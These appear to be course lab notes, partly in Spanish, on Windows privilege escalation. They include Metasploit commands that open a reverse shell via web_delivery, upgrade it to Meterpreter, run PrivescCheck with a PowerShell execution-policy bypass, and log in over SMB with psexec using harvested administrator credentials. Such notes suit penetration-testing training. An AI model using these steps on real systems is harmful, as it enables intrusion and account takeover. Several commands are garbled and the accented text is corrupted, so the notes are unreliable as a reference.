Windows Privilege Escalation

Identifying Windows Privilege Escalation Vulnerabilities

Para aumentar sus privilegios en Windows, primero debe identificar las vulnerabilidades de escalada de privilegios que existen en el sistema de destino.

Este proceso variar谩 en gran medida seg煤n el tipo de destino al que obtenga acceso. La escalada de privilegios en Windows se puede realizar mediante una gran cantidad de t茅cnicas seg煤n la versi贸n de Windows y la configuraci贸n 煤nica del sistema.

Este proceso puede ser bastante tedioso y consumir mucho tiempo y, como resultado, se recomienda automatizar los procesos de identificaci贸n de vulnerabilidades de escalada de privilegios. Esto se puede hacer mediante el uso de varios scripts de automatizaci贸n.

PrivescCheck

PrivescCheck Este script tiene como objetivo enumerar problemas comunes de configuraci贸n de Windows que se pueden aprovechar para la escalada de privilegios locales. Tambi茅n recopila informaci贸n diversa que puede ser 煤til para la explotaci贸n y/o la postexplotaci贸n.

Demo: Identifying Windows Privilege Escalation Vulnerabilities

msf5 > search web_delivery
msf5 > use 1
msf5 exploit(mutti/script/web_delivery) > show options
msf5 exploit(mutti/script/web_delivery) > show info
msf5 exploit(mutti/script/web_delivery) > set target PSH
msf5 exploit(mutti/script/web_delivery) > set payload windows/ shell/ reverse_tcp
msf5 exploit(mutti/script/web_delivery) > set PSH-EncodedCommand false
msf5 exploit(mutti/script/web_delivery) > set LHOST ethl
msf5 exploit(mutti/script/web_delivery) > exploit
# Generara una lia de comando para ejecutar en el equipo de la victima desde
# un powershell o cmd
# Una vez ejecuta preciona enter en la sesion de Metasploit
msf5 exploit(mutti/script/web_delivery) > sessions
# Ingresar a la session y ejecutarlo en segundo plano
msf5 exploit(mutti/script/web_delivery) > search shell_to

msf5 exploit(mutti/script/web_delivery) > use 0
msf5 post(mutti/manage/shelt_to_meterpreter) > show options
msf5 post(mutti/manage/shelt_to_meterpreter) > set LHOST ethl
msf5 post(mutti/manage/shelt_to_meterpreter) > set SESSION 1
msf5 post(mutti/manage/shelt_to_meterpreter) > show advance
msf5 post(mutti/manage/shelt_to_meterpreter) > set WIN_TRANSFER VBS
msf5 post(mutti/manage/shelt_to_meterpreter) > show options
msf5 post(mutti/manage/shelt_to_meterpreter) > exploit

# Tener en cuenta que levantara una sesion y se debe de ingresar a esa session
meterpreter > sysinfo
meterpreter > ps
# Migrar al explorador de windows
meterpreter > migrate 3624
# Ver los privilegios actuales
meterpreter > getuid
meterpreter > getprivs
# Transferir el powershell al equipo de la victima

meterpreter > dir
Listing: C:\Users\student\Desktop\PrivescCheck
C:\Users\student\Desktop\PrivescCheck> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Enumera Usuario y grupos
# Privilegios del usuario actua
# Vulnerabilidades en conrtasenas
# Ver la posibilidad de ejecutar con el comando  -extend

Quiz: Identifying Windows Privilege Escalation Vulnerabilities

Windows Privilege Escalation

Demo: Windows Privilege Escalation

# Segun el ejempllo aterior se encontro credenciales en CREDS > WinLogon

# Nos autenticamos por SMB con la contrase帽a recopilada
psexec.py Administrator@10.4.21.189
whoami
net user
whoami /privs

# Atravez  de metasplot
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
msf5 exploit(windows/smb/psexec) > show optionsset LPORT 44221
msf5 exploit(windows/smb/psexec) > show optionsset RHOSTS 10.4.21.189
msf5 exploit(windows/smb/psexec) > show optionsset SMBUser administrator
msf5 exploit(windows/smb/psexec) > show optionsset SMBPass hello 123321
msf5 exploit(windows/smb/psexec) > show optionsexploit
meterpreter > sysinfo
meterpreter > getuid

Quiz: Windows Privilege Escalation

Last updated